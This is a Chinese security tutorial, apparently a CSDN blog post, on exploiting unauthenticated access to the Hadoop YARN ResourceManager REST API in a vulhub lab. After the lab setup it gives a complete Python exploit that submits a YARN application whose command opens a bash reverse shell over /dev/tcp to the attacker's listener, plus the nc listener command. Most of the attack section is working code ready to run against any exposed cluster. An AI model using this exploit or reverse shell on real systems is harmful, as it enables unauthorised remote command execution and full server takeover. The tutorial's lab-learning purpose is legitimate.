数据库安全:Hadoop 未授权访问-命令执行漏洞.

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

[数据库安全:Hadoop 未授权访问-命令执行漏洞.](#数据库安全:Hadoop 未授权访问-命令执行漏洞.)

[Hadoop 未授权访问-命令执行漏洞:](#Hadoop 未授权访问-命令执行漏洞:)

[开启 vulhub 靶场环境:](#开启 vulhub 靶场环境:)

[Hadoop 未授权访问-命令执行漏洞测试:](#Hadoop 未授权访问-命令执行漏洞测试:)


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

第一步:切换到 vulhub 目录下

复制代码
cd vulhub

第二步:切换到 hadoop 目录下

复制代码
cd hadoop

第三步:切换到 unauthorized-yarn 漏洞目录下.


第四步:开启 漏洞 服务.

复制代码
docker-compose up -d

第五步:访问 http:// (靶场 IP 地址):8088


Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

复制代码
http://192.168.0.106:8088/cluster/apps

第二步:在 攻击机(kali)设置监听.

python 复制代码
nc -nvlp 8888

// 设置 监听 端口为8888

第三步:编写 Python 执行代码.

python 复制代码
import requests

def shell(url,vps_ip,port):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
    id = response.json()["application-id"]
    data = {
        'application-id': id,
        'application-name': 'getshell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
            },
        },
        'application-type': 'YARN'}
    exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
    print("[+] 执行完成!")


if __name__ == '__main__':
    url = input("目标的URL:")
    vps_ip = input("监听的主机IP地址(kali):")
    port = input("监听的主机端口(kali):")
    shell(url,vps_ip,port)

执行代码:


第四步:返回 监听的主机查看结果,发现已经成功.


参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili

相关推荐
wq8973876 小时前
[AI问答]OpenSSL3.0+上的异步调用
网络安全
kali-Myon9 小时前
CTFshow-Pwn142-Off-by-One(堆块重叠)
c语言·数据结构·安全·gdb·pwn·ctf·
缘友一世10 小时前
PentestGPT V2源码研究之EGATS规划器
网络安全·渗透测试
一目Leizi11 小时前
Burp Suite实战:利用不同响应进行用户名枚举与密码爆破
运维·服务器·安全
大大打打12 小时前
7. 军用涡扇发动机全流程核心边界保护与异常工况处置
安全·涡扇发动机·发动机工作原理·军用涡扇发动机·战斗机
初九之潜龙勿用12 小时前
C# 解决“因为算法不同,客户端和服务器无法通信”的问题
服务器·开发语言·网络协议·网络安全·c#
宇擎智脑科技12 小时前
Claude Code 源码分析(二):Shell 命令安全体系 —— AI Agent 执行终端命令的纵深防御设计
人工智能·安全·claude code
Daiyaosei13 小时前
紧急安全警报:Axios npm 包被投毒事件详解与防护指南
前端·javascript·安全
运维行者_13 小时前
通过 OpManager 集成 Firewall Analyzer 插件,释放统一网络管理与安全的强大能力
大数据·运维·服务器·网络·数据库·安全
上海云盾-小余13 小时前
什么是流量清洗?DDoS 防御的核心原理与实战应用
网络·安全·web安全·ddos